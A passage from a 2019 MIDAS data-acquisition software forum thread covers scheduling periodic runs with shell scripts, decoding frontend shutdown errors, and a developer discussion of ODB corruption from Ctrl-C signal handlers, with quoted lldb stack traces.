    WAIT ODBValue,"/Equipment/DTM/Statistics/Events sent",>,100

Where DTM is the frontend of my trigger. Because of the lag in the run stop, the run will always exceed by few
seconds*rates.

Hope it helps
    Reply  13 Mar 2019, Konstantin Olchanski, Forum, Run length 
I did not quite understand your desired sequence, is this what you want:

- at 1pm
- start a run
- record 100 events
- end the run
- (this will be, say, 1:15pm)
- start a run
- at 2pm
- end the run
- start a run
- record 100 events
- ad infinitum

There are 2 difficulties with this:

1) If you want your cycle to be exactly 1 hour, you need to use cron or something similar - if you just "start; sleep 3600; stop", 
your cycle will be slightly longer than 1 hour because starting and stopping runs takes some time to complete.

2) if you want your "100 event" run to start exactly precisely on the hour, you need to stop the previous run a few 
minutes/seconds before the hour to avoid the "run stop" delay.

Instead of using the sequencer, I would use a shell script (run it from crontab to avoid problem (1))

#/bin/sh
mtransition stop # stop the previous long run
odbedit set "/logger/channels/0/settings/event limit" 100
odbedit set "/logger/auto restart" "y"
mtransition start # start the short run
# end

In your frontend end_of_run() function, add this:
odb set "/logger/channels/0/settings/event limit" 0

This will produce the following sequence:

- script will stop previous long run
- set event limit to 100, start the "100 events" run
- logger will stop at 100 events, call your frontend end_of_run(), set event limit to 0
- logger auto restart will start a new run, event limit is now 0, this is your long run
- on the hour, cron runs your script, cycle repeats from the top.

Instead of cron, your can use a looper script. Note that you must run
the main script in the background (note the "&") to avoid problem (1).

#!/bin/foo
# looper script
while (true) {
   main_script &
   sleep 3600   
}
#end

To stop the sequence, kill the looper script.

K.O.


> Dear all,
>         I need to implement a DAQ sequence where a short run (100 events, which takes a couple of 
> minutes) is taken every hour, with a long run in between two short runs. In the sequencer, I can do:
> 
> LOOP infinite
> 
> .... some ODB settings ....
>      TRANSITION START
>      WAIT events 100
>      TRANSITION STOP
> 
> .... some ODB settings ....
>      TRANSITION START
>      WAIT seconds 3600
>      TRANSITION STOP
> 
> ENDLOOP
> 
> 
> I have two questions: 
> 
> - for the long run, I want to write on disk only a maximum number of events. I think I can suppress 
> the event polling in the frontend, with an ODB query of the number of collected events. I'm 
> wondering if there is a smarter way to do that. It is also ok if the run is stopped after a maximum 
> number of events, but the subsequent short run should still start exactly after 1h from the previous 
> short run. 
> 
> - with the script above, the real time lapse between the start of two short runs would depend on 
> the duration of the short run itself. Is there a way to start the short run exactly 1 h after the starting 
> of the previous short run?
> 
> Thank you in advance for your help,
>               Francesco
Entry  12 Mar 2019, Francesco Renga, Forum, Problem stopping every second run 
Dear all,
         I'm running a DAQ frontend and it works well if one single run is
taken. If I try to take a second run right after, the run is performed but, when
stopping it, I get the error messages below. Any hint?

Thank you for your help,
      Francesco


11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:6022:cm_shutdown,ERROR] Killing
and Deleting client 'cygnus_daq' pid 12472

11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:6019:cm_shutdown,ERROR] Cannot
connect to client 'cygnus_daq' on host 'localhost', port 46341

11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:9539:rpc_client_connect,ERROR]
cannot connect to host "localhost", port 46341: connect() returned -1, errno 111
(Connection refused)

11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:10821:rpc_client_call,ERROR]
call to "cygnus_daq" on "localhost" RPC "rc_transition": error,
ss_recv_net_command() status 411

11:42:24.012 2019/03/12 [mhttpd,ERROR] [system.c:4715:ss_recv_net_command,ERROR]
error receiving network command header, see messages

11:42:24.011 2019/03/12 [mhttpd,ERROR] [system.c:4661:recv_tcp2,ERROR]
unexpected connection closure

11:42:23.994 2019/03/12 [cygnus_daq,ERROR] [midas.c:1951:,ERROR]
cm_disconnect_experiment not called at end of program
    Reply  13 Mar 2019, Konstantin Olchanski, Forum, Problem stopping every second run 
>          I'm running a DAQ frontend and it works well if one single run is
> taken. If I try to take a second run right after, the run is performed but, when
> stopping it, I get the error messages below. Any hint?

Sure. I will read the error messages for you: note that they come in reverse time order - oldest message is at the bottom. I 
will reverse them in my reading:

> 11:42:23.994 2019/03/12 [cygnus_daq,ERROR] [midas.c:1951:,ERROR]
> cm_disconnect_experiment not called at end of program

your frontend has exited (this error message is printed by the atexit() code, so you did not crash but called exit(), 
somehow).

> 11:42:24.011 2019/03/12 [mhttpd,ERROR] [system.c:4661:recv_tcp2,ERROR]
> unexpected connection closure

mhttpd reports that the socket connection to your frontend has closed (because the frontend stopped, closing all it's 
sockets)

> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [system.c:4715:ss_recv_net_command,ERROR]
> error receiving network command header, see messages

mhttpd network code next layer reports this same error again

> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:10821:rpc_client_call,ERROR]
> call to "cygnus_daq" on "localhost" RPC "rc_transition": error,
> ss_recv_net_command() status 411

mhttpd network code next layer reports this same error again, now we see that it was trying
to execute a "run start" (or "stop") RPC call to your frontend. But your frontend unexpectedly
shutdown (instead of replying to the RPC).

Next messages after that is mhttpd decided that your frontend is faulty (does not respond to RPC correctly) and tried to 
shut it down, but failed (cannot connect, etc). Last message is mhttpd cleaning up your frontend from ODB (because the 
frontend did not cleanup after itself - it did not call cm_disconnect_experiment(), per the very first error message).


So this is what we see from the midas messages - your frontend unexpectedly exited during the run transition - if as you 
say the run was stopping at the time, it would be in your end_of_run() function.

To debug this, I would do:

a) put some printf() statements in end_of_run() and see what they say during the crash
b) run the frontend inside the debugger, you may need to set a breakpoint on exit() or something like that.


Good luck,
K.O.





> 
> Thank you for your help,
>       Francesco
> 
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:6022:cm_shutdown,ERROR] Killing
> and Deleting client 'cygnus_daq' pid 12472
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:6019:cm_shutdown,ERROR] Cannot
> connect to client 'cygnus_daq' on host 'localhost', port 46341
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:9539:rpc_client_connect,ERROR]
> cannot connect to host "localhost", port 46341: connect() returned -1, errno 111
> (Connection refused)
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [midas.c:10821:rpc_client_call,ERROR]
> call to "cygnus_daq" on "localhost" RPC "rc_transition": error,
> ss_recv_net_command() status 411
> 
> 11:42:24.012 2019/03/12 [mhttpd,ERROR] [system.c:4715:ss_recv_net_command,ERROR]
> error receiving network command header, see messages
> 
> 11:42:24.011 2019/03/12 [mhttpd,ERROR] [system.c:4661:recv_tcp2,ERROR]
> unexpected connection closure
> 
> 11:42:23.994 2019/03/12 [cygnus_daq,ERROR] [midas.c:1951:,ERROR]
> cm_disconnect_experiment not called at end of program
Entry  20 Feb 2019, Konstantin Olchanski, Info, odb needs protection against ctrl-c 
Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.

This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
and strange things will happen (including odb corruption).

In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
arrangements to make it happen, but I have seen it happen in normal use when running experiments.

K.O.

(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
    frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
    frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
    frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
    frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
    frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
    frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
    frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
    frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
    frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
    frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
    frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
    frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
    frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
    frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
alarm.c:310 [opt]
    frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
    frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
    frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
    frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
    frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
    frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
    frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
    frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
    Reply  20 Feb 2019, Stefan Ritt, Info, odb needs protection against ctrl-c 
Not sure if you realized, but there is a two-stage Ctrl-C handling inside midas. The first time you hit ctrl-c, the handler just sets a flag for the main event loop, so that the program can gracefully exit without trouble. This is 
done inside cm_ctrlc_handler(), which sets _ctrlc_pressed true if called. Then cm_yield() tests this flag and returns RPC_SHUTDOWN if so. I agree not very obvious, maybe we should return a more appropriate status. So the 
main loop must check the return status of cm_yield() and break if it's RPC_SHUTDOWN. The frontend framework mfe.c does this for example in

 while (status != RPC_SHUTDOWN && status != SS_ABORT);

Any use-written program should do the same (well, probably this is nowhere documented).

Now when the program does not exit (e.g. if it's in an infinite loop), then the second ctrl-c creates a hard abort and terminates the program non-gracefully, which as you noticed can lead to undesired results. All the 
semaphores (at least when I implemented it) had a SEM_UNDO flag when obtaining ownership. This means that if the semaphore is locked and the process who owns it terminates (even with a hard kill), then the semaphore 
is released by the OS. This way a crashed program cannot keep the ODB locked for example. Not sure that with all your modifications in the semaphore calls this functionality is still guaranteed.

Stefan

> Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.
> 
> This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
> and strange things will happen (including odb corruption).
> 
> In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
> arrangements to make it happen, but I have seen it happen in normal use when running experiments.
> 
> K.O.
> 
> (lldb) bt
> * thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
>   * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
>     frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
>     frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
>     frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
>     frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
>     frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
>     frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
>     frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
>     frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
>     frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
>     frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
>     frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
>     frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
>     frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
> y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
> 0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
>     frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
>     frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
> alarm.c:310 [opt]
>     frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
>     frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
>     frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
>     frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
>     frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
> odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
>     frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
>     frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
>     frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
       Reply  20 Feb 2019, Konstantin Olchanski, Info, odb needs protection against ctrl-c 
> Not sure if you realized, but there is a two-stage Ctrl-C handling inside midas.

Hmm... I am looking at the ctrl-c handler inside odbedit.

Yes, and the original bug report is against odbedit - press of ctrl-c in odbedit corrupts odb,
see stack trace in https://bitbucket.org/tmidas/midas/issues/99

So maybe only the odbedit ctrl-c handler is defective...

I will take a look at what the other ctrl-c handler does.

Safest is probably to call exit() without calling cm_disconnect_experiment().

From the ctrl-c handler, if we call cm_disconnect_experiment() -
- if we hold odb locked, we deadlock (after I remove the recursive mutex) or corrupt odb (if we run form inside db_create or db_set_data).
- if we run from inside db_lock/unlock, we abort() (with my newly added protection) or explode (if we run from inside mprotect(), like in the stack strace in the bug report)

I would say, from a signal handler, only safe things are - set a flag, or abort()/exit().

exit() is not super safe because the user may have attached some code to it that may access odb. (our
default atexit() handler just prints an error message).

K.O.


> The first time you hit ctrl-c, the handler just sets a flag for the main event loop, so that the program can gracefully exit without trouble. This is 
> done inside cm_ctrlc_handler(), which sets _ctrlc_pressed true if called. Then cm_yield() tests this flag and returns RPC_SHUTDOWN if so. I agree not very obvious, maybe we should return a more appropriate status. So the 
> main loop must check the return status of cm_yield() and break if it's RPC_SHUTDOWN. The frontend framework mfe.c does this for example in
> 
>  while (status != RPC_SHUTDOWN && status != SS_ABORT);
> 
> Any use-written program should do the same (well, probably this is nowhere documented).
> 
> Now when the program does not exit (e.g. if it's in an infinite loop), then the second ctrl-c creates a hard abort and terminates the program non-gracefully, which as you noticed can lead to undesired results. All the 
> semaphores (at least when I implemented it) had a SEM_UNDO flag when obtaining ownership. This means that if the semaphore is locked and the process who owns it terminates (even with a hard kill), then the semaphore 
> is released by the OS. This way a crashed program cannot keep the ODB locked for example. Not sure that with all your modifications in the semaphore calls this functionality is still guaranteed.
> 
> Stefan
> 
> > Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.
> > 
> > This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
> > and strange things will happen (including odb corruption).
> > 
> > In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
> > arrangements to make it happen, but I have seen it happen in normal use when running experiments.
> > 
> > K.O.
> > 
> > (lldb) bt
> > * thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
> >   * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
> >     frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
> >     frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
> >     frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
> >     frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
> >     frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
> >     frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
> >     frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
> >     frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
> >     frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
> >     frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
> >     frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
> >     frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
> >     frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
> > y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
> > 0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
> >     frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
> >     frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
> > alarm.c:310 [opt]
> >     frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
> >     frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
> >     frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
> >     frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
> >     frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
> > odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
> >     frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
> >     frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
> >     frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
          Reply  20 Feb 2019, Stefan Ritt, Info, odb needs protection against ctrl-c 
Have you read what I wrote? The current ctrl-c handler just sets the _ctrlc_pressed flag. It might be that some programs do not correctly interprete the return of cm_yield(), certainly the frontend does it correctly. On the SECOND ctrl-c, the program gets 
(internally) hard aborted, equivalent to calling abort(). Not sure if the code works everywhere, I see now that cm_yield(() should maybe return SS_ABORT like 

if (_ctrlc_pressed)
  return SS_ABORT;

then command_loop will exit gracefully. Have to check mfe.c, mlogger.c etc. if they all check for SS_ABORT returned from cm_yield().

> > Not sure if you realized, but there is a two-stage Ctrl-C handling inside midas.
> 
> Hmm... I am looking at the ctrl-c handler inside odbedit.
> 
> Yes, and the original bug report is against odbedit - press of ctrl-c in odbedit corrupts odb,
> see stack trace in https://bitbucket.org/tmidas/midas/issues/99
> 
> So maybe only the odbedit ctrl-c handler is defective...
> 
> I will take a look at what the other ctrl-c handler does.
> 
> Safest is probably to call exit() without calling cm_disconnect_experiment().
> 
> From the ctrl-c handler, if we call cm_disconnect_experiment() -
> - if we hold odb locked, we deadlock (after I remove the recursive mutex) or corrupt odb (if we run form inside db_create or db_set_data).
> - if we run from inside db_lock/unlock, we abort() (with my newly added protection) or explode (if we run from inside mprotect(), like in the stack strace in the bug report)
> 
> I would say, from a signal handler, only safe things are - set a flag, or abort()/exit().
> 
> exit() is not super safe because the user may have attached some code to it that may access odb. (our
> default atexit() handler just prints an error message).
> 
> K.O.
> 
> 
> > The first time you hit ctrl-c, the handler just sets a flag for the main event loop, so that the program can gracefully exit without trouble. This is 
> > done inside cm_ctrlc_handler(), which sets _ctrlc_pressed true if called. Then cm_yield() tests this flag and returns RPC_SHUTDOWN if so. I agree not very obvious, maybe we should return a more appropriate status. So the 
> > main loop must check the return status of cm_yield() and break if it's RPC_SHUTDOWN. The frontend framework mfe.c does this for example in
> > 
> >  while (status != RPC_SHUTDOWN && status != SS_ABORT);
> > 
> > Any use-written program should do the same (well, probably this is nowhere documented).
> > 
> > Now when the program does not exit (e.g. if it's in an infinite loop), then the second ctrl-c creates a hard abort and terminates the program non-gracefully, which as you noticed can lead to undesired results. All the 
> > semaphores (at least when I implemented it) had a SEM_UNDO flag when obtaining ownership. This means that if the semaphore is locked and the process who owns it terminates (even with a hard kill), then the semaphore 
> > is released by the OS. This way a crashed program cannot keep the ODB locked for example. Not sure that with all your modifications in the semaphore calls this functionality is still guaranteed.
> > 
> > Stefan
> > 
> > > Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.
> > > 
> > > This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
> > > and strange things will happen (including odb corruption).
> > > 
> > > In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
> > > arrangements to make it happen, but I have seen it happen in normal use when running experiments.
> > > 
> > > K.O.
> > > 
> > > (lldb) bt
> > > * thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
> > >   * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
> > >     frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
> > >     frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
> > >     frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
> > >     frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
> > >     frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
> > >     frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
> > >     frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
> > >     frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
> > >     frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
> > >     frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
> > >     frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
> > >     frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
> > >     frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
> > > y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
> > > 0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
> > >     frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
> > >     frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
> > > alarm.c:310 [opt]
> > >     frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
> > >     frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
> > >     frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
> > >     frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
> > >     frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
> > > odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
> > >     frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
> > >     frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
> > >     frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
    Reply  20 Feb 2019, Konstantin Olchanski, Info, odb needs protection against ctrl-c 
Commit f81ff3c protects db_lock/unlock, but not any of the other functions. What if we do ctrl-c in the middle
of some odb write operation in the middle of memory allocation, etc.

A sure way to corrupt odb.

Perhaps we should disallow odb access from signal handlers? But we still want to be able to stop midas
programs using ctrl-c, even if the program is in some infinite loop somewhere and is not processing
midas events (no calls to cm_yield(), etc).

Maybe I should change the ctrl-c handler to set a flag for cm_yield() to return SS_EXIT,
and additional ctrl-c do nothing if this flag is already set? (maybe abort() if they do ctrl-c 10 times?).

K.O.

> Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.
> 
> This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
> and strange things will happen (including odb corruption).
> 
> In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
> arrangements to make it happen, but I have seen it happen in normal use when running experiments.
> 
> K.O.
> 
> (lldb) bt
> * thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
>   * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
>     frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
>     frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
>     frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
>     frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
>     frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
>     frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
>     frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
>     frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
>     frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
>     frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
>     frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
>     frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
>     frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
> y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
> 0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
>     frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
